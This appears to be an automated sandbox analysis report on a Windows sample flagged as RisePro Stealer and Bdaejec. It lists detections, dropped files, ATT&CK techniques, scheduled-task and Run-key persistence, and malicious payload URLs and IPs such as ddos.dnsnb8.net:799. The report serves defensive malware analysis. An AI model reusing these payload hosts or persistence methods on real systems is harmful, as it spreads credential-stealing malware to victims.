Source: Yara match	File source: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Lisect_AVT_24003_G1A_89.exe PID: 4912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MPGPH131.exe PID: 5272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MPGPH131.exe PID: 3692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RageMP131.exe PID: 1716, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match	File source: Process Memory Space: jHYZko.exe PID: 6484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jHYZko.exe PID: 2516, type: MEMORYSTR

Yara detected RisePro Stealer

Source: Yara match	File source: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Lisect_AVT_24003_G1A_89.exe PID: 4912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MPGPH131.exe PID: 5272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MPGPH131.exe PID: 3692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RageMP131.exe PID: 1716, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	2 Native API	1 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	11 Input Capture	11 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Access Token Manipulation	3 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	11 Input Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Scheduled Task/Job	112 Process Injection	13 Software Packing	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 DLL Side-Loading	NTDS	24 System Information Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Registry Run Keys / Startup Folder	1 Masquerading	LSA Secrets	1 Query Registry	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Virtualization/Sandbox Evasion	Cached Domain Credentials	231 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	11 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	112 Process Injection	Proc Filesystem	12 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Lisect_AVT_24003_G1A_89.exe	95%	ReversingLabs	Win32.Virus.Jadtre
Lisect_AVT_24003_G1A_89.exe	86%	Virustotal		Browse
Lisect_AVT_24003_G1A_89.exe	100%	Avira	W32/Jadtre.B
Lisect_AVT_24003_G1A_89.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\jHYZko.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\ProgramData\MPGPH131\MPGPH131.exe	100%	Avira	W32/Jadtre.B
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\jHYZko.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\ProgramData\MPGPH131\MPGPH131.exe	100%	Joe Sandbox ML
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML
C:\ProgramData\MPGPH131\MPGPH131.exe	95%	ReversingLabs	Win32.Virus.Jadtre
C:\ProgramData\MPGPH131\MPGPH131.exe	86%	Virustotal		Browse
C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	95%	ReversingLabs	Win32.Virus.Jadtre
C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	86%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\jHYZko.exe	92%	ReversingLabs	Win32.Trojan.Madeba
C:\Users\user\AppData\Local\Temp\jHYZko.exe	90%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
ddos.dnsnb8.net	13%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.scintilla.org/scite.rng	0%	URL Reputation	safe
http://www.rftp.comJosiah	0%	URL Reputation	safe
http://www.rftp.comJosiah	0%	URL Reputation	safe
http://www.activestate.com	0%	URL Reputation	safe
http://www.activestate.comHolger	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k3.rar	100%	URL Reputation	malware
http://ddos.dnsnb8.net:799/cj//k3.rar	100%	URL Reputation	malware
http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07	0%	URL Reputation	safe
http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
http://www.rftp.com	0%	URL Reputation	safe
http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k2.rar	100%	URL Reputation	malware
http://www.baanboard.comBrendon	0%	URL Reputation	safe
https://www.smartsharesystems.com/	0%	URL Reputation	safe
http://www.scintilla.org	0%	URL Reputation	safe
http://www.spaceblue.comMathias	0%	URL Reputation	safe
https://www.smartsharesystems.com/Morten	0%	URL Reputation	safe
http://www.develop.com	0%	URL Reputation	safe
http://pki-ocsp.symauth.com0	0%	URL Reputation	safe
http://www.lua.org	0%	URL Reputation	safe
http://ddos.dnsnb8.net/	100%	URL Reputation	malware
http://ddos.dnsnb8.net:799/cj//k1.rar	100%	URL Reputation	malware
http://www.spaceblue.com	0%	URL Reputation	safe
http://www.winimage.com/zLibDll	0%	URL Reputation	safe
http://www.baanboard.com	0%	URL Reputation	safe
http://www.develop.comDeepak	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k1.rarky.tth.txtp	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rarZ	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net/=	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rar=x	100%	Avira URL Cloud	malware
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rar=x	100%	Avira URL Cloud	phishing
https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rarZ	12%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k2.rar=x	12%	Virustotal		Browse
https://t.me/RiseProSUPPORT	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net/=	14%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k4.rar(y	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rarl	100%	Avira URL Cloud	malware
https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll	0%	Virustotal		Browse
https://t.me/RiseProSUPPORT	0%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k4.rarC:	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k3.rarL	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k3.rarO	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k5.rar	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k2.rarl	11%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k3.rarR	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rartC:	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k4.rarC:	12%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k5.rar	13%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k3.rarO	16%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k5.rarsC:	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k3.rarL	9%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k1.rarExh	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k4.rar	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rarm	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k3.rarR	17%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k5.rarHxg	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k3.rarpy_	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rartC:	12%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k4.rar	13%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k5.rarsC:	16%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k2.rarfC:	100%	Avira URL Cloud	malware
https://t.me/RiseProSUPPORTz	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rarm	16%	Virustotal		Browse
http://ddos.dnsnb8.net:799/cj//k2.rarfC:	10%	Virustotal		Browse
https://t.me/RiseProSUPPORTz	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ddos.dnsnb8.net	44.221.84.105	true	false	13%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k3.rar	true	URL Reputation: malware URL Reputation: malware	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar	true	URL Reputation: malware	unknown
http://ddos.dnsnb8.net:799/cj//k5.rar	true	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar	true	URL Reputation: malware	unknown
http://ddos.dnsnb8.net:799/cj//k4.rar	true	13%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k1.rarky.tth.txtp	jHYZko.exe, 00000010.00000003.2369312075.0000000000C58000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarZ	jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmp	true	12%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://www.scintilla.org/scite.rng	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.rftp.comJosiah	SciTE.exe.1.dr	false	URL Reputation: safe URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar=x	jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net/=	jHYZko.exe, 00000001.00000003.2022506492.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	true	14%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://www.activestate.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.activestate.comHolger	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07	Lisect_AVT_24003_G1A_89.exe, RageMP131.exe.0.dr, MPGPH131.exe.0.dr	false	URL Reputation: safe URL Reputation: safe	unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	jHYZko.exe, 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmp, jHYZko.exe, 00000001.00000003.2014334444.0000000001240000.00000004.00001000.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2362229934.0000000000AE0000.00000004.00001000.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542328869.00000000001E3000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll	Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar=x	jHYZko.exe, 00000010.00000003.2369326263.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://upx.sf.net	Amcache.hve.1.dr	false	URL Reputation: safe	unknown
http://www.rftp.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
https://t.me/RiseProSUPPORT	Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4459917823.00000000021A7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.4459389526.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.4459782824.0000000001667000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr	Lisect_AVT_24003_G1A_89.exe, RageMP131.exe.0.dr, MPGPH131.exe.0.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k4.rar(y	jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.baanboard.comBrendon	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
https://www.smartsharesystems.com/	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarl	jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmp	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k4.rarC:	jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.scintilla.org	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.spaceblue.comMathias	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
https://www.smartsharesystems.com/Morten	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k3.rarL	jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmp	true	9%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k3.rarO	jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmp	true	16%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k3.rarR	jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmp	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.develop.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://pki-ocsp.symauth.com0	Lisect_AVT_24003_G1A_89.exe, RageMP131.exe.0.dr, MPGPH131.exe.0.dr	false	URL Reputation: safe	unknown
http://www.lua.org	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rartC:	jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369326263.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net/	jHYZko.exe, 00000010.00000003.2369419269.0000000000C65000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542768504.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369186739.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://ddos.dnsnb8.net:799/cj//k5.rarsC:	jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	true	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.spaceblue.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarExh	jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369326263.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.winimage.com/zLibDll	Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmp	false	URL Reputation: safe	unknown
http://www.baanboard.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarm	jHYZko.exe, 00000001.00000003.2022506492.00000000012D9000.00000004.00000020.00020000.00000000.sdmp	true	16%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k5.rarHxg	jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k3.rarpy_	jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.develop.comDeepak	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarfC:	jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	true	10%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://t.me/RiseProSUPPORTz	MPGPH131.exe, 00000007.00000002.4459389526.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.221.84.105	ddos.dnsnb8.net	United States		14618	AMAZON-AESUS	false
193.233.132.62	unknown	Russian Federation		2895	FREE-NET-ASFREEnetEU	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1481168
Start date and time:	2024-07-25 05:09:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Lisect_AVT_24003_G1A_89.exe
Detection:	MAL
Classification:	mal100.spre.troj.evad.winEXE@27/31@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:09:57	Task Scheduler	Run new task: MPGPH131 HR path: C:\ProgramData\MPGPH131\MPGPH131.exe
05:09:58	Task Scheduler	Run new task: MPGPH131 LG path: C:\ProgramData\MPGPH131\MPGPH131.exe
05:09:59	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
05:10:20	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
23:10:22	API Interceptor	1x Sleep call for process: WerFault.exe modified
23:10:26	API Interceptor	3353362x Sleep call for process: Lisect_AVT_24003_G1A_89.exe modified
23:10:31	API Interceptor	90273x Sleep call for process: MPGPH131.exe modified
23:11:01	API Interceptor	1908979x Sleep call for process: RageMP131.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
44.221.84.105	Lisect_AVT_24003_G1A_84.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	Lisect_AVT_24003_G1A_90.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	Lisect_AVT_24003_G1A_35.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	Lisect_AVT_24003_G1A_54.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	Lisect_AVT_24003_G1A_55.exe	Get hash	malicious	Azorult, Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	Lisect_AVT_24003_G1A_37.exe	Get hash	malicious	Bdaejec, RisePro Stealer	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	Lisect_AVT_24003_G1A_79.exe	Get hash	malicious	Amadey, Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k3.rar
	Lisect_AVT_24003_G1A_70.exe	Get hash	malicious	LummaC, Bdaejec, LummaC Stealer	Browse	ddos.dnsnb8.net:799/cj//k3.rar
	Lisect_AVT_24003_G1A_72.exe	Get hash	malicious	LummaC, Bdaejec, LummaC Stealer	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	Lisect_AVT_24003_G1A_5.exe	Get hash	malicious	Quasar, Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
193.233.132.62	SecuriteInfo.com.Win32.PWSX-gen.14899.4987.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	SecuriteInfo.com.Win32.PWSX-gen.580.27252.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	SecuriteInfo.com.Win32.PWSX-gen.15960.19323.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	9iz0QM9rMM.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	4fMLTRkOfB.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	q7a5JOlhLZ.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	7jv1U7CgKF.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	file.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	SecuriteInfo.com.Win32.PWSX-gen.10022.32492.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe
	file.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.62:57893/hera/amadka.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ddos.dnsnb8.net	Lisect_AVT_24003_G1A_84.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_90.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_35.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_54.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_55.exe	Get hash	malicious	Azorult, Bdaejec	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_37.exe	Get hash	malicious	Bdaejec, RisePro Stealer	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_79.exe	Get hash	malicious	Amadey, Bdaejec	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_70.exe	Get hash	malicious	LummaC, Bdaejec, LummaC Stealer	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_72.exe	Get hash	malicious	LummaC, Bdaejec, LummaC Stealer	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_5.exe	Get hash	malicious	Quasar, Bdaejec	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	Lisect_AVT_24003_G1A_84.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_90.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_35.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_54.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_55.exe	Get hash	malicious	Azorult, Bdaejec	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_37.exe	Get hash	malicious	Bdaejec, RisePro Stealer	Browse	44.221.84.105
	Lisect_AVT_24003_G1A_79.exe	Get hash	malicious	Amadey, Bdaejec	Browse	44.221.84.105
